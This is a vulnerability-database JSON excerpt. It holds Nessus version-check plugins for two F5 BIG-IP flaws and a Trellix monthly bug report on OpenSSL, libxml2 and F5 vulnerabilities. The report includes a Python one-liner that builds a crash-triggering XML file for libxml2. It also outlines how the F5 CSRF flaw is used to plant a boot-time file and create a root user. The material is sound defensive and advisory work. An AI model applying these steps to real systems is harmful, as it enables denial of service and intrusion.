"cpe:2.3:a:f5:big-ip_analytics:15.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:16.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:14.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_fraud_protection_service:15.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_domain_name_system:13.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:16.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_fraud_protection_service:16.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:15.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:16.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:14.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_acceleration_manager:16.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_acceleration_manager:15.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:13.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:17.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_fraud_protection_service:17.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:14.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:15.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:15.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_acceleration_manager:14.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:13.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:14.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:14.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:17.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:16.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:13.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:15.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:13.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:15.1.8:*:*:*:*:*:*:*"]}], "nessus": [{"lastseen": "2023-03-25T10:52:25", "description": "The version of F5 Networks BIG-IP installed on the remote host is prior to tested version. It is, therefore, affected by a vulnerability as referenced in the K94221585 advisory.\n\n - In all versions, BIG-IP and BIG-IQ are vulnerable to cross-site request forgery (CSRF) attacks through iControl SOAP. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated. (CVE-2022-41622)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-11-16T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : iControl SOAP vulnerability (K94221585)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-41622"], "modified": "2023-03-21T00:00:00", "cpe": ["cpe:2.3:a:f5:big-ip_application_security_manager:*:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:*:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:*:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:*:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_wan_optimization_manager:*:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_domain_name_system:*:*:*:*:*:*:*:*", "cpe:2.3:h:f5:big-ip_protocol_security_manager:*:*:*:*:*:*:*:*", "cpe:2.3:h:f5:big-ip:*:*:*:*:*:*:*:*"], "id": "F5_BIGIP_SOL94221585.NASL", "href": "https://www.tenable.com/plugins/nessus/167739", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K94221585.\n#\n# @NOAGENT@\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(167739);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/21\");\n\n script_cve_id(\"CVE-2022-41622\");\n script_xref(name:\"IAVA\", value:\"2023-A-0060\");\n\n script_name(english:\"F5 Networks BIG-IP : iControl SOAP vulnerability (K94221585)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of F5 Networks BIG-IP installed on the remote host is prior to tested version. It is, therefore, affected by\na vulnerability as referenced in the K94221585 advisory.\n\n - In all versions, BIG-IP and BIG-IQ are vulnerable to cross-site request forgery (CSRF) attacks through\n iControl SOAP. Note: Software versions which have reached End of Technical Support (EoTS) are not\n evaluated. (CVE-2022-41622)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.f5.com/csp/article/K94221585\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5 Solution K94221585.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-41622\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'F5 BIG-IP iControl CSRF File Write SOAP API');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/11/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/11/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/11/16\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_domain_name_system\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude('f5_func.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar version = get_kb_item('Host/BIG-IP/version');\nif ( ! version ) audit(AUDIT_OS_NOT, 'F5 Networks BIG-IP');\nif ( isnull(get_kb_item('Host/BIG-IP/hotfix')) ) audit(AUDIT_KB_MISSING, 'Host/BIG-IP/hotfix');\nif ( ! get_kb_item('Host/BIG-IP/modules') ) audit(AUDIT_KB_MISSING, 'Host/BIG-IP/modules');\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nvar sol = 'K94221585';\nvar vmatrix = {\n 'AFM': {\n 'affected': [\n '17.0.0','16.1.0-16.1.3','15.1.0-15.1.8','14.1.0-14.1.5','13.1.0-13.1.5'\n ],\n },\n 'APM': {\n 'affected': [\n '17.0.0','16.1.0-16.1.3','15.1.0-15.1.8','14.1.0-14.1.5','13.1.0-13.1.5'\n ],\n },\n 'ASM': {\n 'affected': [\n '17.0.0','16.1.0-16.1.3','15.1.0-15.1.8','14.1.0-14.1.5','13.1.0-13.1.5'\n ],\n },\n 'DNS': {\n 'affected': [\n '17.0.0','16.1.0-16.1.3','15.1.0-15.1.8','14.1.0-14.1.5','13.1.0-13.1.5'\n ],\n },\n 'GTM': {\n 'affected': [\n '17.0.0','16.1.0-16.1.3','15.1.0-15.1.8','14.1.0-14.1.5','13.1.0-13.1.5'\n ],\n },\n 'LTM': {\n 'affected': [\n '17.0.0','16.1.0-16.1.3','15.1.0-15.1.8','14.1.0-14.1.5','13.1.0-13.1.5'\n ],\n },\n 'PEM': {\n 'affected': [\n '17.0.0','16.1.0-16.1.3','15.1.0-15.1.8','14.1.0-14.1.5','13.1.0-13.1.5'\n ],\n },\n 'PSM': {\n 'affected': [\n '17.0.0','16.1.0-16.1.3','15.1.0-15.1.8','14.1.0-14.1.5','13.1.0-13.1.5'\n ],\n },\n 'WOM': {\n 'affected': [\n '17.0.0','16.1.0-16.1.3','15.1.0-15.1.8','14.1.0-14.1.5','13.1.0-13.1.5'\n ],\n }\n};\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n var extra = NULL;\n if (report_verbosity > 0) extra = bigip_report_get();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n}\nelse\n{\n var tested = bigip_get_tested_modules();\n var audit_extra = 'For BIG-IP module(s) ' + tested + ',';\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, 'running any of the affected modules');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-25T14:40:13", "description": "The version of F5 Networks BIG-IP installed on the remote host is prior to tested version. It is, therefore, affected by a vulnerability as referenced in the K13325942 advisory.\n\n - In all versions of BIG-IP, when running in Appliance mode, an authenticated user assigned the Administrator role may be able to bypass Appliance mode restrictions, utilizing an undisclosed iControl REST endpoint. A successful exploit can allow the attacker to cross a security boundary. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated. (CVE-2022-41800)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 8.7, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.8}, "published": "2022-11-16T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : Appliance mode iControl REST vulnerability (K13325942)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-41800"], "modified": "2023-03-21T00:00:00", "cpe": ["cpe:2.3:a:f5:big-ip_application_security_manager:*:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:*:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:*:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:*:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_wan_optimization_manager:*:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_domain_name_system:*:*:*:*:*:*:*:*", "cpe:2.3:h:f5:big-ip_protocol_security_manager:*:*:*:*:*:*:*:*", "cpe:2.3:h:f5:big-ip:*:*:*:*:*:*:*:*"], "id": "F5_BIGIP_SOL13325942.NASL", "href": "https://www.tenable.com/plugins/nessus/167738", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K13325942.\n#\n# @NOAGENT@\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(167738);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/21\");\n\n script_cve_id(\"CVE-2022-41800\");\n script_xref(name:\"IAVA\", value:\"2023-A-0060\");\n\n script_name(english:\"F5 Networks BIG-IP : Appliance mode iControl REST vulnerability (K13325942)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of F5 Networks BIG-IP installed on the remote host is prior to tested version. It is, therefore, affected by\na vulnerability as referenced in the K13325942 advisory.\n\n - In all versions of BIG-IP, when running in Appliance mode, an authenticated user assigned the\n Administrator role may be able to bypass Appliance mode restrictions, utilizing an undisclosed iControl\n REST endpoint. A successful exploit can allow the attacker to cross a security boundary. Note: Software\n versions which have reached End of Technical Support (EoTS) are not evaluated. (CVE-2022-41800)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.f5.com/csp/article/K13325942\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5 Solution K13325942.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:M/C:C/I:C/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-41800\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'F5 BIG-IP iControl Authenticated RCE via RPM Creator');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/11/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/11/16\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_domain_name_system\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude('f5_func.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar version = get_kb_item('Host/BIG-IP/version');\nif ( ! version ) audit(AUDIT_OS_NOT, 'F5 Networks BIG-IP');\nif ( isnull(get_kb_item('Host/BIG-IP/hotfix')) ) audit(AUDIT_KB_MISSING, 'Host/BIG-IP/hotfix');\nif ( ! get_kb_item('Host/BIG-IP/modules') ) audit(AUDIT_KB_MISSING, 'Host/BIG-IP/modules');\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nvar sol = 'K13325942';\nvar vmatrix = {\n 'AFM': {\n 'affected': [\n '17.0.0','16.1.0-16.1.3','15.1.0-15.1.8','14.1.0-14.1.5','13.1.0-13.1.5'\n ],\n },\n 'APM': {\n 'affected': [\n '17.0.0','16.1.0-16.1.3','15.1.0-15.1.8','14.1.0-14.1.5','13.1.0-13.1.5'\n ],\n },\n 'ASM': {\n 'affected': [\n '17.0.0','16.1.0-16.1.3','15.1.0-15.1.8','14.1.0-14.1.5','13.1.0-13.1.5'\n ],\n },\n 'DNS': {\n 'affected': [\n '17.0.0','16.1.0-16.1.3','15.1.0-15.1.8','14.1.0-14.1.5','13.1.0-13.1.5'\n ],\n },\n 'GTM': {\n 'affected': [\n '17.0.0','16.1.0-16.1.3','15.1.0-15.1.8','14.1.0-14.1.5','13.1.0-13.1.5'\n ],\n },\n 'LTM': {\n 'affected': [\n '17.0.0','16.1.0-16.1.3','15.1.0-15.1.8','14.1.0-14.1.5','13.1.0-13.1.5'\n ],\n },\n 'PEM': {\n 'affected': [\n '17.0.0','16.1.0-16.1.3','15.1.0-15.1.8','14.1.0-14.1.5','13.1.0-13.1.5'\n ],\n },\n 'PSM': {\n 'affected': [\n '17.0.0','16.1.0-16.1.3','15.1.0-15.1.8','14.1.0-14.1.5','13.1.0-13.1.5'\n ],\n },\n 'WOM': {\n 'affected': [\n '17.0.0','16.1.0-16.1.3','15.1.0-15.1.8','14.1.0-14.1.5','13.1.0-13.1.5'\n ],\n }\n};\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n var extra = NULL;\n if (report_verbosity > 0) extra = bigip_report_get();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n}\nelse\n{\n var tested = bigip_get_tested_modules();\n var audit_extra = 'For BIG-IP module(s) ' + tested + ',';\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, 'running any of the affected modules');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "trellix": [{"lastseen": "2022-12-07T00:00:00", "description": "# The Bug Report \u2014 November 2022 Edition\n\nBy Austin Emmitt \u00b7 December 07, 2022\n\n Like granny always said, \u201cnever hack on an empty stomach.\u201d \n\n\n## Why am I here?\n\nThis year I am thankful for some vivifying vulnerabilities and exceptional exploits! The world of enterprise software security is certainly not slowing down as the holidays approach, so there is plenty of delicious content to gobble up in this month\u2019s Bug Report, our quick and easily digested list of the most important bugs of the last 30 days. November was a capacious cornucopia of interesting infosec, so let's break down a few of the most significant bits:\n\n * CVE-2022-3786 + CVE-2022-3602: OpenSSL 3.0\n * CVE-2022-40303 + CVE-2022-40304: libxml2\n * CVE-2022-41622 + CVE-2022-41800: F5 BIG-IP\n\nAlthough the vulns in OpenSSL 3.0 were announced the last week of October and feel like they happened forever ago at this point, they weren\u2019t publicly disclosed until the first of November, meaning they just barely didn\u2019t make it into last month\u2019s Spooky Edition. Sorry for any confusion!\n\n## CVE-2022-3786 + CVE-2022-3602: \u201cSpookySSL\u201d overflows\n\n### What is it?\n\nNovember flew in with a SQUAWK as new \u201ccritical\u201d vulnerabilities were announced in OpenSSL 3.0 in the last week of October before being disclosed on the first. CVE-2022-3786 and CVE-2022-3602 were discovered by Viktor Dukhovni and [Polar Bear (aka Sandbox Escaper)](<https://sandboxescaper.blogspot.com/p/disclosures_8.html>), respectively, and involve buffer overflows in the process of [X.509 certificate](<https://en.wikipedia.org/wiki/X.509>) verification.\n\n### Who cares?\n\nEveryone was on the edge of their dining room chairs fearing that this could be HeartBleed 2.0, an easily exploited bug that could lead to disclosure of sensitive information or worse, full control over the victim machine. Luckily, these two bugs turned out to be difficult-to-impossible to exploit due to modern mitigations, and they required that the certificate come from a trusted authority (or that the verification process continue despite trust errors). Combined, these requirements led the vulnerabilities to be lowered in severity from \u201ccritical\u201d to \u201chigh.\u201d However, these are still significant bugs due to the ubiquitous usage of OpenSSL, though many may still be on versions earlier than 3.0, which are not affected.\n\n### What can I do?\n\n Phil Swift asks that you patch ASAP \n\n\nFrom OpenSSL.org: \u201cUsers of OpenSSL 3.0.0 - 3.0.6 are encouraged to upgrade to 3.0.7 as soon as possible. If you obtain your copy of OpenSSL from your Operating System vendor or other third party then you should seek to obtain an updated version from them as soon as possible.\u201d\n\n## CVE-2022-40303 + CVE-2022-40304: Xml parsing vulnerabilities just in time for xmas\n\n### What is it?\n\nThere are some new XML vulns just in time for the Xmas season. Maddie Stone, Ned Williamson, and Nathan Wachholz of Google Project Zero disclosed multiple vulnerabilities in libxml2, a widely used XML parser developed for GNOME. Maddie Stone discovered an [integer overflow in the function xmlParseNameComplex](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2336>) (CVE-2022-40303) that can be triggered by including a name that is 0x80000000 bytes or more long. A sample file to reproduce this crash can be crafted very simply with: \n\n \n \n python3 -c 'print(\"<!DOCTYPE doc [\\n<!ATTLIST src \" + \"a\"*(0x80000000) + \" IDREF #IMPLIED>\")' > name_big.xml\n\nCVE-2022-40304 is another vulnerability in libxml2, but caused by entity reference cycles being handled improperly for dicts, leading to memory corruption. The [commit message of the fix](<https://gitlab.gnome.org/GNOME/libxml2/-/commit/1b41ec4e9433b05bb0376be4725804c54ef1d80b>) for this bug reads: \u201cWhen an entity reference cycle is detected, the entity content is cleared by setting its first byte to zero. But the entity content might be allocated from a dict. In this case, the dict entry becomes corrupted leading to all kinds of logic errors, including memory errors like double-frees.\u201d\n\n### Who cares?\n\nThe above issues may be interesting targets for attackers as libxml2 is used in many applications, including Webkit, which prompted Apple to release [MacOS 13.0.1](<https://support.apple.com/en-us/HT213504>) and [iOS 16.1.1](<https://support.apple.com/en-us/HT213505>) to address them. Worryingly, these vulnerabilities could lead to arbitrary code execution in the process parsing an attacker-controlled XML document. While CVE-2022-40303 requires that the \u201cXML_PARSE_HUGE\u201d option be enabled for the library to be vulnerable \u2013 as it requires parsing a 2GB+ file \u2013 there is no such requirement for the reference cycle issue.\n\n### What can I do?\n\nDevelopers should update libxml2 dependencies to [version 2.10.3](<https://gitlab.gnome.org/GNOME/libxml2/-/releases/v2.10.3>), which has patched the vulnerabilities. Apple users should also update to MacOS 13.0.1 and iOS 16.1.1 to address these vulnerabilities on those platforms.\n\n## CVE-2022-41622 + CVE-2022-41800: Are they a big deal?\n\n### What is it?\n\n[Rapid 7 discovered two vulnerabilities in F5 BIG-IP and iControl](<https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/>) that can lead to remote code execution (RCE). CVE-2022-41622 is a cross-site request forgery (CSRF) vulnerability that can lead to unauthenticated RCE! A chill just ran up my spine, and I have the heat cranking! This issue exists because the endpoint \u201c/iControl/iControlPortal.cgi\u201d did not have any protection against CSRF. This endpoint provides several APIs, including upload_file and create_user capabilities.\n\nCVE-2022-41800, on the other hand, is an \u201cRPM Spec Injection\u201d vulnerability that can result in authenticated RCE; the \u2018authenticated\u2019 qualifier is due to the vulnerability existing in an administrator-only page. By including a crafted JSON payload with an authenticated administrator session, it is possible to perform command injection.\n\n### Who cares?\n\nWhile both issues result in remote code execution, the first issue can be exploited pre-auth using CSRF by planting binaries using the upload_file API. During exploitation, this was used to create a file at \u201c/shared/f5_update_action,\u201d which is executed two minutes after boot. Additionally, the iControlPortal.cgi script is setuid root, allowing the same vulnerability to be exploited with the create_user action to create a new root user which could then be used to login via SSH. Both of the above techniques can be seen in the [PoC on GitHub](<https://github.com/rbowes-r7/refreshing-soap-exploit>). Despite the seriousness of these vulnerabilities, Rapid7 claims that \u201cwidespread exploitation of the issues in this disclosure is unlikely\u201d due to the multiple requirements that all must be satisfied in order to be exploited. These include targeting a user that has an authenticated session to the control interface, or already having credentialled access to the server. With this in mind, affected users don\u2019t need to stay up late hitting F5 waiting for patches!\n\n### What can I do?\n\nF5 responded to these disclosures by asking users to evaluate their risk given the limitations of the vulnerabilities and said they would make engineering hotfixes available upon request. Proper fixes will be included in a future release. Thankfully, F5 has stated that there has been no indication of these vulnerabilities being actively exploited.\n\n_This document and the information contained herein describes computer security research for educational purposes only and the convenience of Trellix customers. _\n", "cvss3": {}, "published": "2022-12-07T00:00:00", "type": "trellix", "title": "The Bug Report \u2013 November 2022 Edition", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-3602", "CVE-2022-3786", "CVE-2022-40303", "CVE-2022-40304", "CVE-2022-41622", "CVE-2022-41800"], "modified": "2022-12-07T00:00:00", "id": "TRELLIX:D11572BEEA987F8F8C27E6F40965167E", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/the-bug-report-november-2022-edition.html", "cvss": {"score": 0.0, "vector": "NONE"}}]}